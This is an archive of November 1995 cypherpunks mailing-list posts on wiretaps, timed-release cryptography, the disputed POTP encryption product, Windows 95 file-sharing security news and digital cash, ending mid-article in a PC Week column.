Subject: Re: ACLU Cyber-Liberties Update: Nov. 8, 1995
In-Reply-To: <199511111547.HAA08706@blob.best.net>
Message-ID: <Pine.SOL.3.91.951111175814.24413B-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 10 Nov 1995, James A. Donald wrote:

> At 05:15 PM 11/8/95 -0500, ACLUNATL@aol.com wrote:
> > According to the government's own statistics, 1,800 innocent conversations
> > are intercepted each and every time a wiretap or other form of electronic
> > surveillance is placed.
> 
> This seems curiously inefficient, even for government work.

Only if the government isn't interested in monitoring the 1,800 innocent 
conversations.

-Brad Dolan, 

Who was stopped and questioned at a highway "checkpoint" this morning.
This was the third time this year.

Listen to a few thousand conversations or question a few thousand 
motorists, and you're bound to find somebody up to something.



>  ---------------------------------------------------------------------
>               				|  
> We have the right to defend ourselves	|   http://www.jim.com/jamesd/
> and our property, because of the kind	|  
> of animals that we are. True law	|   James A. Donald
> derives from this right, not from the	|  
> arbitrary power of the state.		|   jamesd@echeque.com
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@omni.voicenet.com>
Date: Mon, 13 Nov 1995 10:12:46 +0800
To: cypherpunks@toad.com
Subject: Re: Who needs time vaults anyway?
In-Reply-To: <Pine.SOL.3.91.951111130652.15607B-100000@chivalry>
Message-ID: <Pine.LNX.3.91.951111181038.160A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 11 Nov 1995, Simon Spero wrote:

> Depending on how fine grained you want the release to be, you could also 
> take the inverse of Moore's law, work out how big a key you need to have 
> it unbreakable in less than the desired time, add in whatever fudge 
> factors you feel like based on how much it would be worth to the opponent 
> to get early access, then lock up the secret and throw away the key. 
> 
> Simon
> 

The main problem I would see with this scheme is that it uses Moore's law.
I do not think that Moore's law will hold true forever.  Microchips are
becoming so small that they will eventually reach a point where they will
not be able to be any smaller without facing quantum uncertainty.  At
this point, either the increase in computer speed will stop or something
like parallel processing or quantum computers will become feasible and the
amount of compute time will be very little.  Using this type of scheme
might be usefull now, but most likely, a new law about increasing computer
power will have to be developed in the next twenty years.
   
--
`finger -l markm@omni.voicenet.com` for public key and Geek Code
Public Key/1024: 0xF9B22BA5 BD 24 D0 8E 3C BB 53 47  20 54 FA 56 00 22 58 D5
Homepage URL:http://www.voicenet.com/~markm/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 13 Nov 1995 10:26:48 +0800
To: cypherpunks@toad.com
Subject: Re: DejaNews all over again
Message-ID: <v02120d01accae02812ec@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>  Jeff, I think it's in your best interest to not waste your time
>responding to this moron (who bears many features in common with
>Detweiler)

Except for his esteemed "credentials", of course...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 14 Nov 1995 05:33:18 +0800
To: cypherpunks@toad.com
Subject: Re: POTP Security
Message-ID: <199511111919.UAA08790@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



   We ordered POTP based on the initial blurbs by Kahn and
   others. It took a while to get it, we talked to Elementrix
   HQ and got voicemail, stutters and recordings saying be
   patient. We read c'punks' slash and burns in the waiting
   period. When the boxes appeared, we read the extra-thin
   documents -- mostly PR gush -- reflected, decided to leave
   the red white and blue boxes At No Time Padded.

   Later a POTP distributer's rep called to ask how we like
   the product. We said, haven't tried it, because we learned
   a bit from reading cryptography lists. We wondered if he
   knew what was being said.

   He said, yes, we know, but they're all wrong, it's a
   fabulous product, totally secure.

   How you gonna prove it, we asked, to consumers like us who
   don't know who to believe? You know, we're reading more
   these days about hacks of cryptography and we want to know
   more than press releases. The people you're citing for
   endorsement aren't cryptographers.

   Yes, he said, that's what we're hearing, that's why I'm
   calling you, we looking for users to endorse the program
   while we're waiting for patent approvals, and trying to get
   the crypto authorities to sign NDA's.

   Sorry, we said, we're can't take a chance on your product.
   Call us back after you get the crypto fuck-authorities to
   hack at it in public.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A.Back@exeter.ac.uk
Date: Mon, 13 Nov 1995 13:16:28 +0800
To: bryce@colorado.edu
Subject: Who needs time vaults anyway?
In-Reply-To: <199511110843.AAA18344@infinity.c2.org>
Message-ID: <13530.199511112217@olib>
MIME-Version: 1.0
Content-Type: text/plain



> > Can anyone explain what use this theoretical "time-sensitive" crypto
> > box would be good for?
>
> 	Suppose you die.

Suppose you get "silenced", or carted off by big brother for thought
crime.  A defense: if you try to silence me, this info gets plastered
all over the net.

Suppose you discovered a polynomial time factoring algorithm (dream
on:-), and wanted to sell it to the highest bidder - what odds that
the NSA would try to obtain it and silence you?  Time-release would be
useful for such things.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 13 Nov 1995 13:41:41 +0800
To: Duncan Frissell <cypherpunks@toad.com
Subject: Re: "Industry Group Rebuffs U.S. on Encryption"
Message-ID: <199511130522.VAA09142@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:04 PM 11/12/95 -0500, Duncan Frissell wrote:
> There were no nation states or cops prior to 1600.  
> It is perfectly possible that there will be no nation 
> states or cops at some point in the future.

To be strictly correct, there were no cops in the english speaking world
from the time of the saxon invasions to the nineteenth century.  There
were however the functional equivalent of cops at some places, and 
some times -- mostly in societies that collapsed or sank into utter 
tyranny.

One can reasonably argue that the persians and scythians 
etc were nation states, and that sometimes nation states 
existed during the dark ages and medieval period, but until 
fairly recently, most of what we now call western civilization 
regarded what we would now call a nation state as a rare, 
curious, and pathological aberration.

I expect that we will soon once again regard them as 
pathological, and I hope that we will be able to regard
them as rare.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Mon, 13 Nov 1995 10:35:27 +0800
To: cypherpunks@toad.com
Subject: Re: Timed-release crypto and information economics
In-Reply-To: <199511091621.QAA01045@orchard.medford.ma.us>
Message-ID: <483a87$u5k@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <199511091852.NAA01172@bioanalytical.com>,
Beavis B. Thoopit <beavis@bioanalytical.com> wrote:
> initialize buffer to '12#fjKL3_*(ASDdj1ll3_13 asdfasd-1-3!#!23'
> do forever      /* actually until the plaintext spews out */
>   sleep 1 unit
>   for each element in the buffer
>     buffer[ element ] = magictransform( buffer[ element ] )

But the "sleep one unit" part is vulnerable, unless (a) the whole device
is physically armored, which is probably not easier than armoring a
memory chip; or (b) the process -- the whole device, not just a clock --
is based on some basic principle of physics that has time in the equation.
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Mon, 13 Nov 1995 20:06:25 +0800
To: jcobb@ahcbsd1.ovnet.com (James M. Cobb)
Subject: Re: POTP Security
In-Reply-To: <Pine.BSD.3.91.951111001407.24482H-100000@ahcbsd1.ovnet.com>
Message-ID: <9511120717.AA25332@doom>
MIME-Version: 1.0
Content-Type: text/plain



> On 11 10 95 jgrubs@left.webcasters.com inquired about POTP 
> security: 
>  
>  What level of security does this cute, little puppy provide??? 
>  
>  
> One approach to answering that inquiry is an excerpt from: 
>  
>  Date: Sat, 21 OCT 95 10:58:51 -0500 
>  From: Paul Jackman <jacktech@delphi.com>
>  Newgroups: talk.politics.crypto
>  Subject: Re: Elementrix One-Time Pad 
> 
>  
>  ...mine [Jackman's background and experience] goes back to 1961 
>  as Crypto Communications Control Command Center Supervisor for 
>  the National Security Agency (NSA), and US Army Inteligence Se- 
>  curity.  Even so, I do not consider myself expert in either the 
>  technical sense or the historical sense.  But, I know enough not 
>  to comment on algorithms that I don't have access to.
>  
>  The algorithm will be published when patent protection is assured.
>  It is currently patent pending in several countries.
>  
>  As far as marketing goes, this product is not going to disapear.
>  We have been premarketing security technology for four years through
>  beta, and one year in pilot with international Fortune 100 companies.
>  The initial presentations on Internet about a year ago showed us that
>  the the newness and complexity of the Algorithm had to be presented
>  one on on one to the experts which Elementrix has done.  There is a 
>  long parade of companies that have implimented this technology but 
>  do not wish to be named, (Typical of any security implementation. 
>  Those who do aknowledge the integity of the products are noteworthy, 
>  Allen Brill Kroll Assoc., Al Decker Coopers & Lybrand, Todd Sun Mer- 
>  gent, and there will be many more.

Also noteworthy are those who have examined the product under NDA and
declined to give an endorsement.


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ahupp@primenet.com (Adam Hupp)
Date: Tue, 14 Nov 1995 04:42:06 +0800
To: cypherpunks@toad.com
Subject: Re: Register
Message-ID: <199511120442.VAA08265@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: viking@pacifier.com (Robert East)
>Date: Wed, 08 Mar 1995 22:46:45 -0800
>Subject: Register
>
>Register
>
>I'd like to sign up for email
>
>Bob

I'd like to sign up for a clue
 
Thanks!

:)

_____________________________________________________________

"We work in the dark  We do what we can  We give what we have
Our doubt is our passion  And our passion is our task   
The rest is the madness of art."  
                   --Henry James
___________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Mon, 13 Nov 1995 09:30:50 +0800
To: cypherpunks@toad.com
Subject: Re: expiration dates on cryptography
In-Reply-To: <acc62dde07021004cd59@[205.199.118.202]>
Message-ID: <483im9$ja@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <acc62dde07021004cd59@[205.199.118.202]>,
Timothy C. May <tcmay@got.net> wrote:
> Even the "timed-release cryptography" is NOT a pure cryptographic system,
> as the idea of "temporal state" in crypto is iffy. That is, clocks can be
> jiggered. Even "sealed clocks" can be jiggered.

True "timed-release crypto" isn't possible with pure mathematics,
because time never appears in mathematical equations.  Time does appear in
physical equations, so it's conceivable that a device could be built that
really wouldn't divulge a secret for a given length of time.  However,
I'm not sure how such a device would work, and I'm not sure it would be
practical for long periods (longer than a human lifetime).

What I'm really proposing is "event-release" crypto based on reputation,
with checks and balances so that you can minimize the necessary level of
trust and prove breach of contract.  I think this is a useful service,
because you can convince yourself that in practice, it wouldn't be
profitable for the crypto houses to default, nor for an attacker to
compromise every house.

Once you have event-release crypto, time-release is an easy special case,
with zero human interaction and thus fast turnaround and low cost; but
"the beginning of the twentyfirst century" is just an event, as is "my
death" or "a horse with exactly three vowels in its name wins the 1996
Kentucky Derby".

I'm writing code for Tembel's Crypto House now, so I can get an empirical
grasp on this.

> "Self-destruct crypto" would work roughly the same way:
> 
> -- N agents holding pieces of puzzle, contracted to destroy those pieces on
> such-and-such date.

I don't see how this could work, considering that once there are copies
of a message in circulation among nontrusted parties it is impossible
to destroy the information.  Also, it's impossible to verify that an
agent has destroyed a message!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKVN++yjYMb1RsVfAQF+6gQAkHRUneu61JtuHSuSIqS64eFSeMq/FUPw
ZXPf11EaIHrnyRW0KCedCbIG1EBcVfMCK4aQ/tLYZsPrROw/GXwns7H9RHfI64XN
aG41PjS7fBqzB21aV5MQCZ3vGzvvLLOwGVKo3SjteliHjKOyiJkEefjdP2KOzrjF
YfYNvmd3iZM=
=VIA/
-----END PGP SIGNATURE-----
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 13 Nov 1995 11:41:29 +0800
To: chen@intuit.com (Mark Chen)
Subject: Re: POTP Security
In-Reply-To: <9511120717.AA25332@doom>
Message-ID: <199511121045.CAA17461@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Anything calling itself a one-time-pad which isn't, imo should
not be trusted, even if r, s, a, d, h, (and everyone else) said the
algorithm was great.


> 
> 
> > On 11 10 95 jgrubs@left.webcasters.com inquired about POTP 
> > security: 
> >  
> >  What level of security does this cute, little puppy provide??? 
> >  
> >  
> > One approach to answering that inquiry is an excerpt from: 
> >  
> >  Date: Sat, 21 OCT 95 10:58:51 -0500 
> >  From: Paul Jackman <jacktech@delphi.com>
> >  Newgroups: talk.politics.crypto
> >  Subject: Re: Elementrix One-Time Pad 
> > 
> >  
> >  ...mine [Jackman's background and experience] goes back to 1961 
> >  as Crypto Communications Control Command Center Supervisor for 
> >  the National Security Agency (NSA), and US Army Inteligence Se- 
> >  curity.  Even so, I do not consider myself expert in either the 
> >  technical sense or the historical sense.  But, I know enough not 
> >  to comment on algorithms that I don't have access to.
> >  
> >  The algorithm will be published when patent protection is assured.
> >  It is currently patent pending in several countries.
> >  
> >  As far as marketing goes, this product is not going to disapear.
> >  We have been premarketing security technology for four years through
> >  beta, and one year in pilot with international Fortune 100 companies.
> >  The initial presentations on Internet about a year ago showed us that
> >  the the newness and complexity of the Algorithm had to be presented
> >  one on on one to the experts which Elementrix has done.  There is a 
> >  long parade of companies that have implimented this technology but 
> >  do not wish to be named, (Typical of any security implementation. 
> >  Those who do aknowledge the integity of the products are noteworthy, 
> >  Allen Brill Kroll Assoc., Al Decker Coopers & Lybrand, Todd Sun Mer- 
> >  gent, and there will be many more.
> 
> Also noteworthy are those who have examined the product under NDA and
> declined to give an endorsement.
> 
> 
> --
> Mark Chen 
> chen@intuit.com
> 415/329-6913
> finger for PGP public key
> D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 14 Nov 1995 04:47:25 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: ACLU Cyber-Liberties Update: Nov. 8, 1995
In-Reply-To: <199511111547.HAA08706@blob.best.net>
Message-ID: <Pine.D-G.3.91.951112031903.23834C-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 10 Nov 1995, James A. Donald wrote:

> At 05:15 PM 11/8/95 -0500, ACLUNATL@aol.com wrote:
> > According to the government's own statistics, 1,800 innocent conversations
> > are intercepted each and every time a wiretap or other form of electronic
> > surveillance is placed.
> 
> This seems curiously inefficient, even for government work.

Not at all.  When a wiretap goes up, agents listen to every call that 
goes to or from the phone.  If the call doesn't relate to anything 
"criminal," they must "minimize" the interception by not listening.  They 
can listen again after some minutes to see if the topic has changed.

The pre-wiretap minimization conference for agents is taken very 
seriously by ethical prosecutors (not an oxymoron for those who ask).  
Good agents (ditto) also take the briefing seriously.

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Mon, 13 Nov 1995 20:05:11 +0800
To: cypherpunks@toad.com
Subject: Re: Who needs time vaults anyway?
In-Reply-To: <199511110843.AAA18344@infinity.c2.org>
Message-ID: <4845bj$7gb@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Ack.  Corrections.

In article <483l88$1f0@yage.tembel.org>, I wrote:
> You could do this with a reflector $ct/2$ metres away, assuming your
> opponent and you are in the same location.

Also assuming your attacker cannot use the information until he can get
it back to Earth, or else he could just race towards the reflector and
catch it on the way back.

> the diameter of the solar system is about 5.4 light-hours

The *radius* of the solar system is about 5.4 light-hours.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKWYqeyjYMb1RsVfAQEkAQP+Id4Y9uJhwC3ywRDMAeCMh3XDHnznKN7V
njNlvkf8hQ9jLVPBbI5rBVRS4ddfmm9SXu9yiTYGpm1Jx29OIYf4Ew4GxUYKFpJc
qM95K9DVRtNuYa2ZHMRVX+znV+der+DxPW8tFt9UXL+PpRfygCPgJJD5CGTcDD8L
5YRZUSthj+U=
=tQ2G
-----END PGP SIGNATURE-----
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Tue, 14 Nov 1995 00:16:11 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: [joke] Re: Who needs time vaults anyway?
In-Reply-To: <v02120d05accab753260f@[199.0.65.105]>
Message-ID: <Pine.3.89.9511121342.A25644-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


Tasteless joke. Do not take seriously.

On Sat, 11 Nov 1995, Robert Hettinga wrote:

> What's that to keep that from happening on the net, just like our much
> maligned (guy's gotta make a living, fer chrissake!) assassination-payoff
> escrow agent...

Oh you must mean those wily hackers at Digicrime. Way to go Matt. 
My server originally had trouble looking up the host; must have been some 
last-ditch effort by those spooks at SAIC (I did note some recent obituaries
and resignations on their board, heheh...). It's all fine now though.

Excellent means of gaining employment and weapons practice. Gives new 
meaning to the phrase "affirmative action hiring". (though I still haven't seen 
my last check in the mail, guys. Hint, hint, hint.)

Just wondering, does the company presently have a market quote for 
captive CS profs? (shaddup over there! stop counting primes already)

Looking forward to the forthcoming Blacknet Unspeakable Comm-Oddities 
Exchange (a rather nice slant on AMIX, eh?). (still selling those babies, 
Tim?)








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@delhi.CS.Berkeley.EDU (David A Wagner)
Date: Tue, 14 Nov 1995 20:28:26 +0800
To: cypherpunks@toad.com
Subject: Re: coding and nnet's
Message-ID: <199511122205.RAA24984@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199511111800.NAA23831@jekyll.piermont.com>,
Perry E. Metzger <perry@piermont.com> wrote:
> 
> > Perhaps neural nets could be used in an unknown plain text, brute force
> > attack to automatically select possible decryptions for human examination. 
> > I don't know of any papers on the subject.
> 
> I remember seeing a good paper by our own David Wagner on how to do
> this without anything more than some ordinary statistics -- no
> complicated junk required. David, if you are reading this, could you
> comment?
> 

Check out
	http://www.cs.berkeley.edu/~daw/recog.ps
for a paper by Steve Bellovin & me on doing plaintext recognition
with ordinary statistics.

It has nothing to do with neural networks, though....
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMKZvoCoZzwIn1bdtAQHItQGA1jD4SjC1Vg1fwCO3VLJ7v+gUlUvncwhj
v2SwPURAjry2QAeWBNeL5hMJARQuQHNx
=Cepa
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 13 Nov 1995 09:30:05 +0800
To: jerry the golden retriever <an407769@anon.penet.fi>
Subject: Re: hacker's dream [Win95]
In-Reply-To: <9511110629.AA27945@anon.penet.fi>
Message-ID: <Pine.ULT.3.91.951112170211.25412B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

This article is basically true. I'm not sure what they mean be "creating 
a simple file on your local machine," though. Anybody?

Microsoft appears to have patched the SMB and C$ bugs, but in the 
US/English release only. Yusuf Mehdi sent me email Thursday promising 
that international patches would be available *within two weeks* --
there  was no explanation for the delay, and I can think of none.

This is discussed a bit in article <4814sh$i3g@Networking.Stanford.EDU>
and folowups, and a bunch of places on 
gopher://quixote.stanford.edu/1m/win95netbugs.

- -rich

On Sat, 11 Nov 1995, jerry the golden retriever wrote:

> 
> Windows 95 Is A Hacker's Dream Over The Internet
> CENTRAL, HONG KONG, 1995 NOV 9 (NB) -- Windows 95, combined with the
> Internet, could be a dream made in hacker heaven. From seasoned propeller
> heads Newsbytes has contacted, it looks like Windows 95 could be more of a
> security nightmare than was first thought.
> 
> This is especially true where fixed link companies are concerned. An
> investigation of the new operating system, when hooked onto the Internet,
> leaves computers wide open. Executing a series of simple, uncomplicated
> commands opens up company and private users' computers to hacking the moment
> they access the Internet, claim some analysts.
> 
> Worse, they may never know it has been done. Using a simple Unix command, a
> hacker can locate the IP (Internet protocol) address of the subscriber logged
> into an Internet service provider. Then he needs only one more thing; a
> logged-on Internet user using Microsoft's new operating system.
> 
> For businesses with leased line Internet links, it can happen at any time,
> day or night. Once the IP address has been noted, the hacker simply creates a
> file through DOS on his own system, specifying the address and naming it.
> Using two other commands -- which purge the remote names on the IP, or
> Internet provider's port -- the system then refreshes and remaps itself in
> preparation to be accessed by the hacker's computer.
> 
> Because Windows 95 is designed with a networking capability, it leaves all
> computers in the office open to illegal access. Once the hacker has called up
> his Map Network Drive, the hard disk on his own machine cannot be
> differentiated from that of the genuine user. All that need be done then is
> to put in a common drive name, most obviously "C:\." For networked machines,
> the default "C$" is common.
> 
> This gives access to all files on the subscriber's drive. While Windows 95
> allows the user to protect the drive by giving it a password, computer
> experts Newsbytes talked to said that device won't necessarily lock out
> intruders. Because the operating system has no "audit" trail -- in other
> words, it does not log who or how someone is accessing the drive -- a hacker
> can spend weeks trying to discover the password. Password search programs,
> like Cracker, are readily available and can break through most simple
> password sequences.
> 
> (Joel McCormick & I.T. Daily/19951109)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKaaO43DXUbM57SdAQG8PQQAvfv+srjQZgAlIIRnrhtpj89scqEQWN5Z
uEHPZE56TSaqVOZnd0m+m8VVaXk0AQ9Lnw9+GwJFG5+LbrF0rkImstRhrquYuO4L
0UjSAKKehTw+Cv023pICPpZ28mqdyXSl7/1ovbuY4U8xJbYc9AxhnCrsUWKexwm4
jN/+LHYQ39M=
=Bhu8
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 13 Nov 1995 12:58:17 +0800
To: cypherpunks@toad.com
Subject: Re: Market Value of Web Pages
Message-ID: <199511130435.UAA08914@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 Nov 1995, Timothy C. May wrote:

> At 6:51 PM 11/9/95, Bill Frantz wrote:
> 
> >BTW - I don't think we should be talking about a penny/page cost because it
> >is way too high for the current market.  For example, my copy of Applied
> >Cryptography V2 cost about $.067/page AND came with the media to keep it
> >"forever".  My (used) copy of Snow Crash cost closer to a penny/page and
> >also came with the media.  I would think that somewhere between 1/100 to
> >1/10 of a penny/page is closer to the current market value of the page
> >content.
> 
> With all due respect to Bill--his mention of agorics tells me he knows
> something about computational ecologies and markets--, there is no
> reasonable way to say what price is "closer to the current market value of
> the page content," except by what the market will bear!
> 
> Yes, a paperback novel is a penny a page or so. But a 5-page consultant's
> report that sells for $2000 has a "market value" to someone of $400 a page.
> You can all think of all kinds of other examples.

Actually, Tim, there are many examples we each could think of.

As an example, I'm presently preparing an unsolicited Security Review
report for a Fortune 500 company.  It's *priced* if you will in the mid
five figure range per page (and that includes the title page, the
appendices, and the pages which say on them, "this page left intentionally
blank"). 

(It's the short report ... the one which references RFC's rather than
including them.  The report that includes RFC's is priced significantly
lower when measured by weight ... i.e. cost/page metering.)

But the report's information value is truly *worth* a factor many, many
hundreds of times what the invoice rate bears or what the cost per page
would indicate.  For me, my current report is in fact a loss leader. 

Since my report IS unsolicited, I really don't even have any real
expectation that the invoice will be approved for payment.  My invoice is
not submitted on that basis.  I realize that I might not even receive
re-imbursement for my out-of-pocket expenses. 

The beneficiary might well think that the information is only worth the
value of a promotional mug or of a promo T-shirt, or maybe even worthless. 
Alternatively, the company might offer a complementary copy of their
product or even just info-freeload as Netscape did with those Berkeley
hombre stud-muffins, some time ago. 

But the information within my unsolicited report is hopefully utilized
none the less, no matter what financial consideration is extended, because
the information is _actually_ priceless, even though the recipient might
consider that information to have only a nominal or "no, or little
compensable value". 

Information is interesting that way.

Because information is/was provided to them "freely" most firms will
not (generally) see any value in the information at all.  They happily
become information free-loaders.  It's paradoxical and ironic in an 
information age.

The huge bill I send out is, literally, the reality check.

No honest person would expect to take a dress home from a shop without
paying, but a lot of normally honest folk don't give a thought to taking
an armload of free information.  Which I guess is an interesting segueway
into a basic briefing on "information value" theory. 

But that part will have to hold for a bit ... once I collect my thoughts
on how information philistines and information connoisseurs have differing
value judgments.  The implications might surprise people.




Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 13 Nov 1995 16:32:44 +0800
To: cypherpunks@toad.com
Subject: Re: "Industry Group Rebuffs U.S. on Encryption"
Message-ID: <199511130204.VAA08135@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:37 PM 11/9/95 +0100, someone who understandably prefers to be
Anonymous wrote:

>In only a few decades, crypto's gone from being unheard of to the object
>of an increasingly high-profile PR war over "domestic and international
>terrorists and criminals." The govt's position, however, hasn't changed
>substantially: it doesn't like crypto, and it never will.

It has changed substantially.  Once "born classified" and subject to prison
sentences during WWII, possession and use of crypto is now "legal as church
on a Sunday."  The government's position as late as 1978 (later in the case
of Admiral Bobby) was that open publication of cryptographic research was
good for a free trip to Leavenworth to make little ones out of big ones.
[The fact that they threatened a lot more than they actually prosecuted
doesn't mean that this wasn't their position.]  Things have changed.

>There will never
>be a time when the cops who pull you over or drop by for a visit will say,
>"Ma'am, if you've encrypted that, we respect the fact that you don't want
>anyone to see that--so we'll just be going bow. You have a nice day, now,
>y'hear." And there will never be no cops.

It is easy to imagine such a thing since that is exactly what cops do now
when they encounter people committing acts which used to be felonies.  They
ignore them.  It is quite possible for social arrangements to change in such
a way that the sovereign is no longer held to be able to compel testimony or
the surrender of information.  Certainly, technological changes can make
cases where the cops are aware that you provably possess information rare.

There were no nation states or cops prior to 1600.  It is perfectly possible
that there will be no nation states or cops at some point in the future.
Since policing is a labor intensive occupation and as currently organized
suffers from socialist inefficiency, it may well be disintermediated.  Thus,
cryptographic protocols can (if desired) practically exclude the possibility
of theft (of digital goods).  And if the bulk of the world's economy
consists of digital goods/services (measured by value not volume or weight
obviously <g>) then computers and crypto may be enough.  
  
Nanotechnology may make self defense more efficient than "others" defense
and may make it so easy to defend against state power that it brings on the
collapse of the nation state.  Technological changes bring social changes.  

Full nanotechnology may not even be necessary.  A computer is a nanomachine.
The capabilities of these toys and the networks they run on may be enough in
and of themselves to weaken monopoly institutions of coercion beyond their
tipping points.

DCF

"Jan, you remember what happened 10 years ago today, don't you?  The world
ended.  As we know it don't you mean?"  -- Too much Firesign Theater, not
enough Calculus.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an407769@anon.penet.fi (jerry the golden retriever)
Date: Tue, 14 Nov 1995 20:29:33 +0800
To: cypherpunks@toad.com
Subject: ecash in pcweek
Message-ID: <9511122125.AA09326@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



Opinion: Digital Cash Takes Step Toward Reality

>From PC Week for November 13, 1995 by Bill Machrone

Some people are always looking for new ways to make money. Other people
are always looking for new ways to spend money. They're running headlong
into one another on the Internet. Most of the digital cash and
electronic commerce schemes out there are still in their infancy, but
many of them are predicated on making a transaction fee off the people
who want to buy things in this new, electronic medium.

Making money from people spending money is hardly a shocking
proposition. But all the approaches that call themselves any kind of
"cash" are stretching the definition. To the best of my knowledge, cash
is the thing you can spend without having it costing you a cent, so to
speak.

The only way you'll see digital cash without transaction costs is if a
powerful but paternalistic ruling body gets into the business. That
doesn't mean if Microsoft builds it into the operating system, but
rather if the government gets involved and makes some form of electronic
money transfer legal tender, and therefore immune to fiscal
encumbrances. This isn't remotely close to happening, so don't get your
hopes up.

Meanwhile, things are getting pretty interesting in the real world of
digital-cash transactions. Digicash (www.digicash.com) has partnered
with the Mark Twain Bank to offer online shoppers a debit card-like "E-
cash" account that they can fill with real money and then use either in
normal purchases or microtransactions from vendors who accept E-cash.
You pay a combination of setup fees, monthly fees, and money-movement
fees, but the overall goal is to make the transactions painless,
transparent, and anonymous. The anonymity factor is a key component of
real cash and a design requirement of Digicash. It's extremely unlikely
that anyone could spoof the system and spend your money; yet you can re-
create your E-cash on your own machine if you have a disk crash.

Portland Software (www.portsoft.com) has also attacked the issue,
putting itself in the position of vendors who want to sell things
electronically. Its approach, called ZipLock, is suited to selling
software products on the spot but is also suitable for published
content, artistic images, and fonts. It approves your credit and goes
through an unlocking/decrypting routine on the spot. The ZipLock
transaction is much more like a normal credit-card transaction and in
fact uses the communications infrastructure built by a major credit-card
clearinghouse. In effect, it transforms your PC into a point-of-sale
terminal, where all you have to do is enter your credit-card number. If
you're ordering software or other electronically deliverable goods,
they're transmitted and decrypted on the spot. Other merchandise is
delivered via the usual direct-marketing vehicles. Fees are paid by the
merchant, which means that the transaction cost is built into the price.

Although E-cash and ZipLock are hardly the only two electronic-payment
schemes out there, their differences are instructive. Each appears to
